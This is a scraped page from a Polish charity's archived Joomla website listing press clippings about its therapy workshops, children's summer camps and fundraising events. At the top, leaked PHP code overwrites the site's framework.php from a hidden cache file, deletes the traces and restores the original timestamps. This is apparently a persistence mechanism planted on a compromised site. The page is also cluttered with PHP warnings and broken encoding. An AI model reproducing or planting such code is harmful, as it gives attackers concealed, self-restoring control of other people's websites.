$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 426
prasa
 

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Gazeta Krakowska: Więcej sal na terapię - Warsztatyw Zawadzie będą rozbudowane
Gazeta Krakowska

 

Warsztaty Terapii Zajęciowej w Zawadzie Uszewskiej czeka rozbudowa. Wyczekiwana in­westycja doczeka się wreszcie realizacji, głównie dzięki lu­dziom dobrego serca, którzy zaoferowali pomoc, zarówno materialną jak i organizacyjną. Prace rozpoczną się już wiosną i mają potrwać około roku.

WTZ w Zawadzie Uszewskiej powstały w 2004 roku, z myślą o 40 uczestni­kach.    Po    dwóch    latach od otwarcia placówki liczba podopiecznych powiększyła się do 45.


Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Gazeta Krakowska: Sprawny inaczej ale nie gorszy
Gazeta Krakowska

Zofia Sit arz

30 niepełnosprawnych bezro­botnych bierze udział w war­sztatach psychologicznych, które zorganizowało stowa­rzyszenie „Pomocna dłoń". Ce­lem szkolenia jest podniesienie własnej samooceny i pewności siebie uczestników. To są bo­wiem główne przeszkody, które uniemożliwiają niepeł­nosprawnym znalezienie za­trudnienia.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Gazeta Krakowska: 2 tys. dla pięcioraczków
Gazeta Krakowska

Stowarzyszenie „Pomocna dłoń" oraz Małgorzata Duśko - artystka fotografik - to główni organizatorzy impre­zy, z której dochód przezna­czony został na rzecz brze­skich pięcioraczków.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Wieści Gminne: Zielone Ochronki po raz szósty
Wieści Gminne

Już szósty raz Stowarzyszenie „Pomocna Dłoń" z Gnojnika zorganizowało półkolonie dla dzieci.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Gazeta Krakowska: 17 tysięcy dla pięcioraczków - Dzięki ofiarności mieszkańców i sponsorów
Gazeta Krakowska

Mimo kiepskiej pogody przez rI plac Kazimierza Wielkiego w Brzesku przewinęło się w ostatnią niedzielę, jak szacują organizatorzy, kilka tysięcy osób. Przychodzili, oglądali wy­stępy zespołów rockowych i wrzucali datki do puszek. Cała ich zawartość trafi na konto Ma­rzeny i Grzegorza Górów - ro­dziców brzeskich pięcioracz­ków.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Gazeta Krakowska: Dla pięcioraczków
Gazeta Krakowska

Do godzin wieczornych trwa­ła wczoraj impreza na placu Kazimierza Wielkiego, której głównymi organizatorami by­ły: Stowarzyszenie „Pomocna dłoń" z Gnojnika, Powiatowe Centrum Pomocy Rodzinie, sta­rostwo i Miejski Ośrodek Kultu­ry. Dochód z imprezy przekaza­ny zostanie na konto rodziców brzeskich pięcioraczków.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Gazeta Krakowska: Zielone ochronki pomagają
Gazeta Krakowska

Od sześciu lat Stowarzyszenie „Pomocna dłoń" z Gnojnika organizuje na terenie po­wiatu akcję letniego wypo­czynku dla dzieci. - Nasze pół­kolonie to rekreacja, gry, zaba­wy, wycieczki, wyjazdy do róż­nych ciekawych miejsc i na ba­sen. Każda szkoła w której or­ganizowane są półkolonie ma swój własny program - mó­wi prezes „Pomocnej dłoni" Ewa Cierniak-Lambert. - Przy­gotowanie i organizacja półko­lonii to praca trwająca cały rok. Najważniejsze jest zdoby­cie środków finansowych. Szu­kamy sponsorów prywatnych i instytucjonalnych, piszemy projekty do konkursów grantowych, zatrudniamy fachową kadrę do opieki nad uczestni­kami.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Dziennik Polski: Zielone Ochronki"
Dziennik Polski

„Zielone Ochronki" zaskar­biły serca nie tylko naszych milusińskich, za ich profilaktyczno-edukacyjno - społecz­ny wymiar stowarzyszenie „Pomocna Dłoń" ż Gnojnika w grudniu 2006 roku Kryszta­łami Soli uhonorował Marek Nawara - Marszałek Woje­wództwa, jest to prestiżowa nagroda w działalności polity­ki prorodzinnej, co jeszcze mocniej utwierdziło nas w za­sadności naszych działań i zwielokrotniło motywację przyznaje Pani Prezes.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Gazeta Krakowska: BIELCZA BORZECIN
Gazeta Krakowska

W tym roku „zielone ochron­ki" po raz pierwszy zawita­ły do Borzęcina. Stowarzysze­nie „Pomocna dłoń" wystąpiło do wójta Janusza Kwaśniaka z propozycją zorganizowania półkolonii, co spotkało się z życzliwym przyjęciem.

- Wójt okazał się możnym sponsorem i ufundował liczne nagrody dla uczestników półko­lonii. Ochronki organizowane były w Bielczy i Borzęcinie. W sumie uczestniczyło w nich około 60 dzieci - mówi prezes „Pomocnej dłoni". Ewa Cier­niak-Lambert.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Gazeta Krakowska: POMOCNA DŁOŃ PÓŁKOLONIE
Gazeta Krakowska
Ponad 150-ciu uczniów z czterech szkół-Woli Dębińskiej, Niedźwiedzy, Łysej Góry i Biadolin Szlacheckich, z terenu gminy Dębno wzięło udział w bezpłatnych półkoloniach, których głównym organizatorem było Stowarzyszenie „Pomocna dłoń" z Gnojnika.
Więcej…
 
<< pierwsza < poprzednia 1 2 3 4 5 6 7 8 następna > ostatnia >>

Strona 1 z 8
Pomagaj razem z nami, moesz przekaza� swoj darowizne za po�rednictwem internetu
Pomoc ofiarom wypadkw komunikacyjnych
Projekty Aktywizujce
Zielone Ochronki
Spartakiady
Warsztaty Terapi Zajciowej w Zawadzie Uszewskiej
 

Copyright © Stowarzyszenie "Pomocna Do"